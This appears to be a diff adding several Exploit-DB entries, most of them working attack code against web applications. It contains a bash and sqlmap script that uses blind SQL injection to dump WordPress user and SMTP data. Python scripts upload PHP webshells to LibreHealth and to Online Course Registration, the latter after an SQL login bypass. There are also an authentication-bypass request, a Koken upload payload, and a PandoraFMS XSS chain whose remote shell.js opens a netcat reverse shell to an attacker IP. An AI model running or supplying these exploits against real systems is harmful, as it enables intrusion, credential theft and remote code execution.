# /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #
# \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #
# \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #
# \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #
# \::/ / \::/ / \::/ / \:\__\ \/__/ #
# \/__/ \/__/ \/__/ \/__/ #
# ___ ___ ___ ___ #
# /\ \ /\ \ /\ \ /\ \ #
# /::\ \ /::\ \ /::\ \ /::\ \ #
# EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #
# Email Subscribers & Newsletters <= 4.2.2 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #
# Unauthenticated File Download /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
# \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #
# \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #
# \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #
# \:\__\ \::/ / \:\__\ \:\__\ #
# KBAZ \/__/ \/__/ \/__/ \/__/ #
# #
# #
################################################################################################
curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'

127
exploits/php/webapps/48699.sh Executable file
View file

@ -0,0 +1,127 @@
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBAZ@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
main () {
header
if [ "$#" -ne 1 ]; then
echo "Usage : bash CVE-2019-20361.sh [BASE URL]"
echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"
exit
fi
url=$1
echo ' Target URL : ' "$url"
echo ' Generating sqlmap tamper script in /tmp'
gen_sqlmap_tamper
sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"
echo ' SQLMap base command : ' "$sqlmap_cmd"
while true
do
sleep 1
echo ''
echo " Possible choices: "
echo ''
echo " 0) Exit"
echo " 1) Simple vulnerability test SLEEP(5)"
echo " 2) Vulnerability test with SQLMap "
echo " 3) Get WP users data"
echo " 4) Get subscribers information"
echo " 5) Get 'Simple WP SMTP' settings"
echo ''
echo -n ' Choice number => '
read n
case $n in
0) exit ;;
1) echo 'Testing SLEEP(5)...'
{ time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;;
2) $sqlmap_cmd ;;
3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;
4) $sqlmap_cmd -T wp_ig_contacts --dump ;;
5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
*) echo "Invalid option" ;;
esac
done
}
header () {
echo ''
echo ' ################################################################################################';
echo ' # ___ ___ ___ ___ ___ #';
echo ' # /\ \ /\ \ /\ \ /\ \ /\ \ ___ #';
echo ' # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #';
echo ' # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #';
echo ' # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #';
echo ' # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #';
echo ' # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #';
echo ' # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #';
echo ' # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #';
echo ' # \::/ / \::/ / \::/ / \:\__\ \/__/ #';
echo ' # \/__/ \/__/ \/__/ \/__/ #';
echo ' # ___ ___ ___ ___ #';
echo ' # /\ \ /\ \ /\ \ /\ \ #';
echo ' # /::\ \ /::\ \ /::\ \ /::\ \ #';
echo ' # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #';
echo ' # Email Subscribers & Newsletters < 4.3.1 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #';
echo ' # Unauthenticated Blind SQL Injection /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';
echo ' # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #';
echo ' # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #';
echo ' # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #';
echo ' # \:\__\ \::/ / \:\__\ \:\__\ #';
echo ' # KBAZ \/__/ \/__/ \/__/ \/__/ #';
echo ' # #';
echo ' # #';
echo ' ################################################################################################';
echo ''
}
raw_commands () {
echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100" '","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' | base64 -w 0
{ time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'
sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3
-T wp_users,wp_usermeta --dump
-T wp_ig_contacts --dump
--sql-query 'select * from wp_options where option_name="swpsmtp_options"'
}
gen_sqlmap_tamper () {
touch /tmp/__init__.py
cat << _END > /tmp/tamper_CVE-2019-1356989.py
#!/usr/bin/env python
import base64
import urllib
def tamper(payload, **kwargs):
#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'
param = '{"contact_id":"'
param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'
#print(param%payload)
return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')
_END
}
main $@

130
exploits/php/webapps/48702.txt Normal file
View file

@ -0,0 +1,130 @@
# Exploit Title: LibreHealth 2.0.0 - Authenticated Remote Code Execution
# Exploit Author: Bobby Cooke
# Date: 2020-07-17
# Vendor Homepage: https://librehealth.io/
# Software Link: https://github.com/LibreHealthIO/lh-ehr
# Version: 2.0.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Exploit Tested Using: Python 2.7.17
# Vulnerability Description:
# LibreHealth v2.0.0 suffers from an authenticated file upload vulnerability allowing
# remote attackers to gain remote code execution (RCE) on the hosting webserver
# via uploading a maliciously crafted image.
import requests, sys, re
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' '
err = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' '
ok = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' '
def webshell(SERVER_URL, WEBSHELL_FILE, session):
try:
WEB_SHELL = SERVER_URL+'sites/default/profile_pictures/'+WEBSHELL_FILE
print(info+"Webshell URL: "+ WEB_SHELL)
getdir = {'telepathy': 'echo %CD%'}
r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
status = r2.status_code
if status != 200:
print(err+"Could not connect to the webshell.")
r2.raise_for_status()
print(ok+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
print(S[1]+F[2]+')'+F[4]+'+++++'+F[2]+'['+F[0]+'=========>'+S[0]+S[3]+' WELCOME BOKU '+S[0]+S[1]+'<========'+F[2]+']'+F[4]+'+++++'+F[2]+'('+F[0]+S[0])
while True:
thought = raw_input(term)
command = {'telepathy': thought}
r2 = requests.post(WEB_SHELL, data=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print('\r\n'+err+'Webshell session failed. Quitting.')
quit()
def sig():
SIG = S[3]+F[4]+".-----.._ ,--.\n"
SIG += F[4]+"| .. > ___ | | .--.\n"
SIG += F[4]+"| |.' ,'-\" \"-. |/ /__ __\n"
SIG += F[4]+"| < "+F[2]+" * *"+F[4]+" \ / \\/ \\\n"
SIG += F[4]+"| |> )"+F[2]+" * * *"+F[4]+" / \\ \\\n"
SIG += F[4]+"|____..- '-."+F[2]+"*"+F[4]+"_"+F[2]+"*"+F[4]+".-'_|\\___|._..\\___\\\n"
SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
return SIG
def formatHelp(STRING):
return S[3]+F[2]+STRING+S[0]
def header():
head = S[3]+F[2]+'LibreHealth v2.0.0 - Authenticated Remote Code Execution (RCE)'+S[0]
return head
if __name__ == "__main__":
print(header())
print(sig())
#0 | Help
if len(sys.argv) != 4:
print formatHelp("(+) Usage:\t python %s <WEBAPP_URL> <USERNAME> <PASSWORD>" % sys.argv[0])
print formatHelp("(+) Example:\t python %s 'http://172.16.65.130/LibreEHR/' 'admin' 'admin'" % sys.argv[0])
sys.exit(-1)
#1 | INIT
USERNAME = "admin"
PASSWORD = "admin"
SERVER_URL = 'http://172.16.65.130/LibreEHR/'
if not re.match(r".*/$", SERVER_URL):
SERVER_URL = SERVER_URL+'/'
LOGIN_URL = SERVER_URL+'interface/login/login.php'
LOGIN_POST = SERVER_URL+'interface/main/main_screen.php?auth=login&site=default'
UPLOAD_URL = SERVER_URL+'interface/new/new_comprehensive_save.php'
#2 | Create Session
s = requests.Session()
get_session = s.get(LOGIN_URL, verify=False)
if get_session.status_code == 200:
print(ok+'Successfully connected to LibreHealth server & created session.')
print(info+"Session Cookie: "+get_session.headers['Set-Cookie'])
else:
print(err+'Cannot connect to the server and create a web session.')
login_data = {'new_login_session_management':'1', 'authProvider':'Default','authUser':USERNAME,'clearPass':PASSWORD,'languageChoice':'1'}
print(info+"Attempting to Login to LibreHealth with credentials: "+USERNAME+":"+PASSWORD)
auth = s.post(url=LOGIN_POST, data=login_data, verify=False, proxies=proxies)
loginchk = str(re.findall(r'Calendar', auth.text))
if loginchk == "[u'Calendar', u'Calendar']":
print(ok+"Login successful.")
else:
print(err+"Failed login. Check credentials.")
#3 | File Upload
PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
png = {
'profile_picture':
(
'kaio-ken.php',
PNG_magicBytes+'\n'+'<?php echo shell_exec($_REQUEST["telepathy"]); ?>',
'image/png',
{'Content-Disposition': 'form-data'}
)
}
fdata = {'form_cb_1':'upload','form_fname':'Sun','form_mname':'','form_lname':'Wukong','form_sex':'Male','form_status':'','form_facility':''}
print(info+"Exploiting avatar file upload vulnerability to upload a PHP webshell")
upload_avatar = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
#4 | Get Webshell Upload Name
uploadchk = str(re.findall(r'demographics\.php\?set_pid=', upload_avatar.text))
if uploadchk == "[u'demographics.php?set_pid=']":
print(ok+"Successfully uploaded webshell")
else:
print(err+"Webshell upload failed.")
avatarFile = str(re.findall(r'demographics\.php\?set_pid=\d*\&', upload_avatar.text))
avatarFile = re.sub('^.*demographics\.php\?set_pid=', '', avatarFile)
avatarFile = re.sub('&.*$', '', avatarFile)
avatarFile = avatarFile+'.php'
print(info+"Webshell Filename: "+avatarFile)
#5 | interact with webshell for Remote Command Execution
webshell(SERVER_URL, avatarFile, s)

113
exploits/php/webapps/48704.py Executable file
View file

@ -0,0 +1,113 @@
# Exploit Title: Online Course Registration 1.0 - Unauthenticated Remote Code Execution
# Exploit Author: Bobby Cooke
# Credit to BKpatron for similar Auth Bypass on admin page - exploit-db.com/exploits/48559
# Date: 2020-07-15
# Vendor Homepage: Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 | Python 2.7.18
import requests, sys, urllib, re
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
ok = Fore.GREEN+'['+Fore.RESET+'+'+Fore.GREEN+']'+Fore.RESET+' '
err = Fore.RED+'['+Fore.RESET+'!'+Fore.RED+']'+Fore.RESET+' '
info = Fore.BLUE+'['+Fore.RESET+'-'+Fore.BLUE+']'+Fore.RESET+' '
RS = Style.RESET_ALL
FR = Fore.RESET
YL = Fore.YELLOW
RD = Fore.RED
def webshell(SERVER_URL, session):
try:
WEB_SHELL = SERVER_URL+'studentphoto/kaio-ken.php'
getdir = {'telepathy': 'echo %CD%'}
r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
status = r2.status_code
if status != 200:
print(err+"Could not connect to the webshell.")
r2.raise_for_status()
print(ok+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
print(RD+')'+YL+'+++++'+RD+'['+FR+'=========>'+' WELCOME BOKU '+'<========'+RD+']'+YL+'+++++'+RD+'('+FR)
while True:
thought = raw_input(term)
command = {'telepathy': thought}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print('\r\n'+err+'Webshell session failed. Quitting.')
quit()
def formatHelp(STRING):
return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
def header():
SIG = RD+' /\\\n'+RS
SIG += YL+'/vvvvvvvvvvvv '+RD+'\\'+FR+'--------------------------------------,\n'
SIG += YL+'`^^^^^^^^^^^^'+RD+' /'+FR+'============'+RD+'BOKU'+FR+'====================="\n'
SIG += RD+' \/'+RS+'\n'
return SIG
if __name__ == "__main__":
print(header())
if len(sys.argv) != 2:
print(formatHelp("(+) Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
print(formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/Online Course Registration/'" % sys.argv[0]))
quit()
SERVER_URL = sys.argv[1]
if not re.match(r".*/$", SERVER_URL):
SERVER_URL = SERVER_URL+'/'
LOGIN_URL = SERVER_URL+'index.php'
PROFILE_URL = SERVER_URL+'my-profile.php'
print(info+'Creating session and saving PHPSESSID')
s = requests.Session()
get_session = s.get(SERVER_URL, verify=False)
if get_session.status_code == 200:
print(ok+'Successfully connected to server and created session.')
print(info+get_session.headers['Set-Cookie'])
else:
print(err+'Cannot connect to the server and create a web session.')
bypass_data = {'regno' : '\' or 1=1; -- boku', 'password' : '\' or 1=1; -- boku', 'submit' : ''}
print(info+'Bypassing authentication of student login portal.')
auth_bypass = s.post(url=LOGIN_URL, data=bypass_data, verify=False)
if auth_bypass.history:
for resp in auth_bypass.history:
print(info+'Response Status-Code: ' + str(resp.status_code))
print(info+'Location: ' + str(resp.headers['location']))
redirectURL = resp.headers['location']
if re.match(r".*change-password.php", redirectURL):
print(ok+'Successfully bypassed user portal authentication.')
else:
print(err+'Failed to bypass user portal authentication. Quitting.')
quit()
get_profile = s.get(url=PROFILE_URL, verify=False)
Name = str(re.findall(r'name="studentname" value=".*"', get_profile.text))
Name = re.sub('^.*name="studentname" value="', '', Name)
Name = re.sub('".*$', '', Name)
PinCode = str(re.findall(r'name="Pincode" readonly value=".*"', get_profile.text))
PinCode = re.sub('^.*name="Pincode" readonly value="', '', PinCode)
PinCode = re.sub('".*$', '', PinCode)
RegNo = str(re.findall(r'name="studentregno" value=".*"', get_profile.text))
RegNo = re.sub('^.*name="studentregno" value="', '', RegNo)
RegNo = re.sub('".*$', '', RegNo)
print(ok+'{studentname:'+Name+', Pincode:'+PinCode+', studentregno:'+RegNo+'}')
avatar_img = {
'photo':
(
'kaio-ken.php',
'<?php echo shell_exec($_REQUEST["telepathy"]); ?>',
'image/png',
{'Content-Disposition': 'form-data'}
)
}
upld_data = {'studentname':Name, 'studentregno':RegNo,'Pincode':PinCode,'cgpa':'0.00','submit':''}
webshell_upload = s.post(url=PROFILE_URL, files=avatar_img, data=upld_data, verify=False)
print(ok+'Uploaded webshell. Now connecting via POST requests using telepathy.')
webshell(SERVER_URL, s)

29
exploits/php/webapps/48705.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-07-14
# Exploit Author: BKpatron
# Vendor Homepage:https://elaniin.com/
# Software Link:https://github.com/elaniin/CMS/archive/master.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/elaniin/login.php
POST /elaniin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 334
Referer:http://localhost/elaniin/login.php
Cookie: PHPSESSID=33snzxs8qht0gvh0fpd27vg62
Connection: close
Upgrade-Insecure-Requests: 1
email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN

76
exploits/php/webapps/48706.txt Normal file
View file

@ -0,0 +1,76 @@
# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
# Date: 2020-07-15
# Exploit Author: v1n1v131r4
# Vendor Homepage: http://koken.me/
# Software Link: https://www.softaculous.com/apps/cms/Koken
# Version: 0.22.24
# Tested on: Linux
# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.md
The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.
Steps to exploit:
1. Create a malicious PHP file with this content:
<?php system($_GET['cmd']);?>
2. Save as "image.php.jpg"
3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.
4. On Burp, rename your file to "image.php"
POST /koken/api.php?/content HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target.com/koken/admin/
x-koken-auth: cookie
Content-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551
Content-Length: 1043
Connection: close
Cookie: PHPSESSID= [Cookie value here]
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="name"
image.php
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="chunk"
0
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="chunks"
1
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="upload_session_start"
1594831856
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="visibility"
public
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="license"
all
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="max_download"
none
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: image/jpeg
<?php system($_GET['cmd']);?>
-----------------------------2391361183188899229525551--
5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server.

118
exploits/php/webapps/48707.txt Normal file
View file

@ -0,0 +1,118 @@
# Exploit Title: PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting
# Date: 2020-07-01
# Author: AppleBois
# Version: 7xx ≤ 746
# Homepage: https://pandorafms.org/
# Software Link: https://sourceforge.net/projects/pandora/files/Pandora FMS 7.0NG/
# CVE-2020-11749
#
# By asking network administrator to scan SNMP device to trigger Cross Site Scripting(XSS)
# We can call a remote JavaScript file to execute arbitrary code to reach Remote Code Execution
# on PandoraFMS.
#
######################################################################################
//----------------/etc/snmp/snmpd.conf-------------------//
syscontact <script>alert('AppleBois');</script>
syslocation <script type="text/javascript" src='http://192.168.11.130/shell.js'></script>
sysname <script type="text/javascript" src="http://192.168.11.130/shell.js"></script>
sysDesc <script>alert('AppleBois');</script>
com2sec local localhost public
view systemview included .1.3.6.1.2.1.1
view systemview included .1.3.6.1.2.1.25.1
view systemview included .1 80
rocommunity public
//--------------end of /etc/snmp/snmpd.conf--------------//
//----------------shell.js-------------------------------//
//Create Random String
function randomString(len, charSet) {
charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
var randomString = '';
for (var i = 0; i < len; i++) {
var randomPoz = Math.floor(Math.random() * charSet.length);
randomString += charSet.substring(randomPoz,randomPoz+1);
}
return randomString;
}
var randomValue = randomString(5);
//Declare Variable
var xhr= new XMLHttpRequest();
var Attacker_IP= "192.168.11.130";
var Pandora_IP ="192.168.11.132";
var port ="4444";
//var payload="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f09468e5082e_select=15&form_max_timeout5f09468e5082e_text=15&form_max_timeout=15&form_max_timeout5f09468e5082e_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&field1_help=&crtbutton=Create"
var payload ="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f096ea47b224_select=15&form_max_timeout5f096ea47b224_text=15&form_max_timeout=15&form_max_timeout5f096ea47b224_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&uptbutton=Update"
var url= "http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=plugins&create_plugin=1&pure=";
//Create a plugin with malicous command
xhr.open("POST",url,true);
xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8");
xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure=");
xhr.setRequestHeader("Content-Length",payload.length);
xhr.setRequestHeader("Connection","close");
xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
xhr.send(payload);
//I am sleepy, i just want to sleep 5 seconds. Please
function sleep(miliseconds) {
var currentTime = new Date().getTime();
while (currentTime + miliseconds >= new Date().getTime()) {
}
}
sleep(5000);
//Grab newly added Plugin ID
var url="/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2";
xhr.open("POST",url,false);
xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8");
xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure=");
xhr.setRequestHeader("Content-Length",payload.length);
xhr.setRequestHeader("Connection","close");
xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
xhr.setRequestHeader("Cache-Control","max-age=0");
var payload ="status_hierachy_mode_sent=1&moduletype=pluginserver&edit_module=1&updbutton=Create";
xhr.send(payload)
var el = document.createElement('html');
var add=xhr.responseText.toString();
el.innerHTML = add;
var dd = el.querySelector('#id_plugin');
var plugin_ID =0;
for (i = 0; i < dd.options.length; i++) {
if(dd.options[i].text == randomValue)
{
console.log(dd.options[i].value);
plugin_ID=dd.options[i].value;
break;
}
}
//Create a new plugin in server module || reverse shell will trigger here
var url = "http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2";
var payload ="network_component_group=0&id_module_component_type=4&network_component=0&name=AppleBois_"+randomValue+"&disabled_sent=1&id_module_group=1&id_module_type_hidden=1&id_module_type=1&type_names=eyIxIjoiZ2VuZXJpY19kYXRhIiwiMiI6ImdlbmVyaWNfcHJvYyIsIjMiOiJnZW5lcmljX2RhdGFfc3RyaW5nIiwiNCI6ImdlbmVyaWNfZGF0YV9pbmMiLCI1IjoiZ2VuZXJpY19kYXRhX2luY19hYnMifQ%3D%3D&min_warning=0&max_warning=0&str_warning=&warning_inverse_sent=1&min_critical=0&max_critical=0&str_critical=&critical_inverse_sent=1&history_data=1&history_data_sent=1&id_plugin="+plugin_ID+"&macros=eyIxIjp7Im1hY3JvIjoiX2ZpZWxkMV8iLCJkZXNjIjoiIiwiaGVscCI6IiIsInZhbHVlIjoiIiwiaGlkZSI6IiJ9fQ%3D%3D&macro_name%5B%5D=macro_value&custom_id=&unit_select=none&unit_text=&unit=&module_interval_select=300&module_interval_text=5&module_interval=300&module_interval_units=60&moduletype=4&post_process_select=&post_process_text=&post_process=&min=&max=&dynamic_interval_select=0&dynamic_interval_text=&dynamic_interval=None&dynamic_interval_units=1&dynamic_min=0&dynamic_max=0&dynamic_two_tailed_sent=1&id_export=0&throw_unknown_events_sent=1&ff_type_sent=1&each_ff=0&ff_event=0&ff_event_normal=&ff_event_warning=&ff_event_critical=&module_ff_interval=0&ff_timeout=0&id_tag_selected%5B%5D=&id_tag_policy%5B%5D=&quiet_module_sent=1&cps_module=0&description=&critical_instructions=&warning_instructions=&unknown_instructions=&hour_from=*&minute_from=*&mday_from=*&month_from=*&wday_from=*&hour_to=*&minute_to=*&mday_to=*&month_to=*&wday_to=*&max_timeout=0&max_retries=0&id_category=0&parent_module_id=0&autocomplete_agent_name=&agent_autocomplete_idagent_5f0967a872ce2=0&relation_type=direct&crtbutton=Create&id_module=4&create_module=1";
xhr.open("POST",url,true);
